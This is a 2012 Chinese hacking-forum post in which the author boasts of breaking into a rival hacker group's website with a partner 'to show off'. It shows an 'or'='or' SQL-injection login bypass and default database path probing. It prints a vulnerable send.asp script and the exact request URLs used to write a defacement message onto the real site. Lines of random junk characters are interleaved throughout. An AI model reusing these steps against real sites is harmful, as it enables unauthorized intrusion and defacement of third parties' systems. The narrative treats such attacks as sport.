中国网络渗透测试联盟
标题:
入侵华东黑客联盟装X的过程
[打印本页]
作者:
admin
时间:
2012-11-6 21:06
标题:
入侵华东黑客联盟装X的过程
有些朋友对我和云中鹰搞华东的过程比较感兴趣,其实那个很没技术含量
9 i: c# d" T/ F$ {6 y2 F* q1 Q5 |
今天闲着无聊,把手上的项目葛一下,来论坛放松一下,顺便说说上次搞华东黑客联盟到装B的过程
! S" S j- d! [" }5 ?
这天云中鸡说华东的某人很牛X,利用JPG黑站大法把恶灵战队黑了,还发了个demo出来
) F6 Z+ x6 R l
我去看了一下demo,感觉很黑客,于是就和云中鸡搞了一下华东
' V1 H& {" b/ @. O2 V7 ^" Y
首先,我记得华东只被人搞过一次(记性不好,原谅下~~),所以应该防护还是比较好的
0 @# P6 `+ P* L. r4 I: ?% _
服务器应该防ARP,不过这还只是猜测
9 U' h" k. B# b! T8 j) Z% L
云中鸡说先不搞C段,PZ一下再说
3 {6 n6 q ] s
然后我就打开了
链接标记[url=http://www.3hack.com
www.3hack.com[/url[/url]]
6 m* j$ [0 Q' ]0 Y1 E3 m, \! { S' j
一看,我晕,怎么网站变了................以前我比较喜欢到华东去看动画,现在怎么变成这鸟样了,晕..............
, @" H3 C. v& T q% X; E: y% I& K
这时候云中鸡丢了一个同F的站过来,说进了后台搞不了shell
8 V% M' [0 q. ~( W
我看了下搞到了一个webshell出来(这里涉及点技巧,不过不是重点,故省略....),登上webshell后发现服务器的权限很BT
( y2 Z5 Q8 p! C
然后我就把shell丢给云中鸡去提权,过了一会儿找到了一个二级玉米的站shop.xiahack.cn
% j# J% Q5 `( l0 O0 k V" K
看着是用eshop来架设的网店,虽然不是同F,但还是想搞下他看有什么可利用的地方,用了几个0day去搞发现不是最新版,0day用不鸟
/ S& ]" n+ i! n3 d/ k4 s
问了下云中鸡提权怎样了,他说还在努力,装不鸟B就不睡觉,晕了,这下入侵陷入了僵局...............
6 T$ ?1 T, Z4 b4 o& D2 d
无聊到网上乱逛,这时无意中发现一个阿拉伯XXXXXX,具体就不说啥鸟,呵呵~~
: ^7 n, w: [# ^, k9 R; m9 ]: x
然后阿拉伯黑客发现了
链接标记[url=http://www.3hack.com
www.3hack.com[/url[/url]]上有个xia的目录很可疑,于是我就去看看是什么
* f9 @$ [( M% J0 C
打开一看,如图1所示。
) [4 Z3 f3 @" x
+ f! _; d! Z! [
http://00day.cn/forum/attachment/thumb/6_1_a8d665f343765b2.jpg
. C4 r: e: g+ L& \
我靠~~这啥东西?这么帅?点进去一看,如图2所示。
0 `' z( `6 W, r3 ?$ d) y
+ V4 m, S/ j: @/ ~( S$ f
http://00day.cn/forum/attachment/thumb/6_1_d741c5c7b6b8a48.jpg
& \/ V3 X4 G8 @% E& t8 M4 R) s
太帅了,真YD!!
V& Z$ a K+ h& s0 z
这个页面应该是一套个人主页程序,而且还挺炫的!
" ?* O; Q0 `9 }' z$ W& x+ y; |
这个页面有发表日志的地方,应该可能存在登陆页面,找了一轮后发现当鼠标放到网页顶端的时候就会弹出登陆页面,如图3所示。
$ x( M& M& S0 U! A9 w K' P- r
, g( G ~' w8 T/ d% W8 v
http://00day.cn/forum/attachment/6_1_b03700cb2fe5d52.jpg
* @; F+ P; J: T* R! F! R$ q" u
嘿嘿,试着'or'='or'居然进去了!!如图4所示。
2 n0 L( @4 t' K8 U4 `& u2 t% x6 g1 w
* j5 U$ h# ^" O& {% w% B- T5 H
http://00day.cn/forum/attachment/6_1_7107004af344a3c.jpg
; g6 C2 S+ d! f/ D. q4 F# ~
经过半个多小时的摸索,还是没有发现可利用的地方。
+ `; ^, W) W- P6 e q
这下郁闷了,不管了,把这套程序下载下来看看吧
& F( E# z' J) A$ j$ C* {
找了一会才知道这套程序叫做“V时代个人flash主页”
& w" N3 H( P2 N( @6 n
到官方下了套最新版,然后找了一下可利用的地方,不一会,我发现“/html/admin”这个目录很可能可以利用
+ {/ ]2 Y( u; |8 v, {6 ` X! C
于是马上打开
链接标记[url=http://www.3hack.com/xia/html/admin
http://www.3hack.com/xia/html/admin[/url[/url]]
0 n4 w# A5 `" d
返回的确实找不到页面,郁闷了,输入
链接标记[url=http://www.3hack.com/xia/html/
http://www.3hack.com/xia/html/[/url[/url]]
+ I+ |2 H5 l; }# c2 g B$ V
同样是找不到页面,真晕!再看看!
& \/ R, l( g7 l/ M7 ~
5分钟过后,我发现后台地址是“/asp”,默认数据库是“/asp/vshidai.mdb”,嘿嘿!这下你不死定了!
# o {# z e2 c/ T5 ]
马上打开
链接标记[url=http://www.3hack.com/xia/asp/vshidai.mdb
http://www.3hack.com/xia/asp/vshidai.mdb[/url[/url]],我晕!服务器居然设置了mdb后缀映射,下载不了!
; C; O$ f5 y; n
打开
链接标记[url=http://www.3hack.com/xia/asp/
http://www.3hack.com/xia/asp/[/url[/url]],发现返回空白,这下我真是服了!
; C _' v* H' f7 X
希望快覆灭了,这时我点到了根目录下的send.asp文件,看到里面存在着一个有意思的东西,代码如下:
, {+ G+ ]5 Y- R6 m
4 w7 ]7 @9 h0 E/ s1 M& P
var a
! S9 H7 `3 p* H
var b
, _( i( z8 z4 z6 v( f' {7 g
var tx
" O9 d* f. d. R2 ^
var clean
) }8 U; ~ G, `. \- B3 \
a=Request("re")
3 B1 g2 C1 t4 l1 q
clean=Request("clean")
# {# i; b j' _& n1 L
var jian="test.txt"
4 \1 K: R. z/ I3 y5 l8 c( P+ i
. Y* ?1 U" X% {1 n
if(clean==1){
6 u8 b6 Y7 l" m/ |& p1 Z+ Y
tx="&a="
* c' ]. a: ?/ D8 I
var fs2
- f5 Q7 n% Y/ U1 }
var fs2=Server.CreateObject("Scripting.FileSystemObject")
0 o& K @. A* r8 H. W1 w, z
var newdt=fs2.OpenTextFile(Server.MapPath(jian),2,true)
! w, j" T& E5 R" n7 D- S
newdt.WriteLine("&a=")
! J* ?$ d: z& n1 E( u
newdt.close()
) F5 e' Q1 p( o+ n) y c
}
6 y8 q6 y# }% D$ a& G* p- m
) }) j) w8 M5 [, Y* s4 z
if(clean==0|clean==1){
& d$ w9 T. J; C. ]
tx=""
+ o; n5 J) v' @
var fso = Server.Createobject("Scripting.FileSystemObject")
/ x' V! B8 }4 T$ C6 R! J1 }6 q- r$ Q
var file = fso.OpenTextFile(Server.Mappath(jian))
( O9 x5 s0 w* P# N) s- U& W+ J4 c
while (!file.AtEndOfStream){
( a3 @1 U. H9 n# t0 B' O
tx=file.ReadLine()
# m* i* e; s$ @1 E Q% K1 ~; q
Response.write (tx)
5 u2 u" l- y( t: Y6 r% X% f# E9 `
}
( Z/ } N5 A- G4 q5 N; [# l' _7 z
Response.write ("&")
% E0 a( ^- J8 w4 [
file.close()
; o; J8 L7 e+ C9 N4 M, V, K
}
/ P% g- i3 Y( r9 ~+ ?9 r1 q# Z
8 K+ U `& q7 Z
if(clean==2){
$ n4 i a8 q( e9 l& Z4 k- W2 G9 j
tx=""
" Y- ]0 T# b1 O4 I& {
var fso = Server.Createobject("Scripting.FileSystemObject")
7 R' \: F7 y. B9 k
var file = fso.OpenTextFile(Server.Mappath(jian))
5 S4 V+ [0 G) p, `
$ h% W, {6 Z8 W. i4 z
var fs2
4 x: ^ E; A8 n$ q3 k R7 k
var fs2=Server.CreateObject("Scripting.FileSystemObject")
8 S. L3 a4 |( s% ~9 e% T" d- @
var newdt=fs2.OpenTextFile(Server.MapPath(jian),8,true)
$ S! {8 ?9 ]& f; g5 N0 @ g
& x# V. L& M- }/ p0 u8 E
c5 Y' A: w% L8 ?3 }
while (!file.AtEndOfStream){
( Y+ g$ |/ M$ p
tx=file.ReadLine()
0 t* c' t. S n: @: C
Response.write (tx)}
# }( B0 ~. Z1 h+ H9 y( |. s
% H$ E8 V0 L& T+ D. N
Response.write (a+"&")
, T! _ [# Z! u6 N5 C) a$ w( i+ e
newdt.WriteLine(a)
/ K7 `4 `5 ~4 p! M( }
# g) y) |9 R5 C' a
file.close()
, u) F" {5 k# P5 q
newdt.close()
+ H8 w* r9 |- C/ i! |. e1 ^$ R1 z5 F% f' n
}
6 U. J+ d! L1 Z
* l% N; l# v% c
* b& O/ E( M3 U* Q- g+ S; k
复制代码
2 \$ d4 N5 T' f4 j3 V9 U
这下应该可以装B了!从代码看出,我们首先要提交“send.asp?clean=1”来创建一个名为test.txt的文件,文件里面写着“&a=&”
* U, x9 r6 k; ]* ^; J
接下来我们提交“send.asp?clean=2&re=H4cked by 落叶纷飞 and 云中鹰....00day.cn全体飘过”
0 r5 ~3 `/ v4 T9 E a
这样就能在test.txt文件里新建一行并写入“H4cked by 落叶纷飞 and 云中鹰....00day.cn全体飘过”这句话
% s" _4 p2 t8 c8 E% m& Q2 t
过程如图5、6所示。
/ p; Z$ p1 \, h' O% W) N: a
) Q7 {, I6 Q( C8 Y+ f7 O9 A
http://00day.cn/forum/attachment/thumb/6_1_cd66a1c03f6682b.jpg
5 Z% j! T' ~2 Z
4 W% Y/ ~! C! m1 v4 q7 ^
http://00day.cn/forum/attachment/thumb/6_1_942adfb1ce45224.jpg
: I6 r# o5 e3 x, A- x
提交后我们打开
链接标记[url=http://www.3hack.com/xia/test.txt
www.3hack.com/xia/test.txt[/url[/url]]看看,如图7所示。
! y" }( S/ m8 ^+ e; f6 g* a @
1 n, |) o9 j$ G ^; {8 t
http://00day.cn/forum/attachment/thumb/6_1_10f60a12650b618.jpg
# R- ]( b' X* U7 |4 F7 n: E8 L! |
这下终于可以装到X了,如果不是V时代的作者写的send.asp代码存在问题,拿到shell是不难的
" F2 Q0 ?, r/ D- L' O$ X6 u
如果jian是经过request取值的话,同样也能搞到shell。
! V( |3 C2 C0 d
这次只是装到了X,并没有拿到shell
3 N6 ? y% e% U% C5 \* J& j* b0 f
已经是凌晨了,跟云中J说了声就睡觉去鸟
% r: I& ]% D. A3 ^
估计那B可能搞到了权限,不过我没问他,最近事情比较多,也比较忙
; a4 `6 i3 ^) A& c& m0 N v
就到这里吧,没技术含量,纯粹装X,高手们见笑了
7 r3 F! ~! M' y0 x# K! h& f' T3 ~
另外劝告某些认为上传个JPG就能黑到站的大黑客,你这样自欺欺人吃亏的是你自己
0 y% p1 D; N/ V+ Z0 l
自己学不到技术,却还在自欺欺人
' x& C( {) `0 F: F1 J
不说了,本文到这里,最后感谢一下阿拉伯黑客,原来阿拉伯黑客也是很强大的,好了,猪大家愉快~~
) r% Q+ A( \' R, n8 e9 l2 @
- c0 W. _2 Y0 [ A) k1 L) p/ |
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2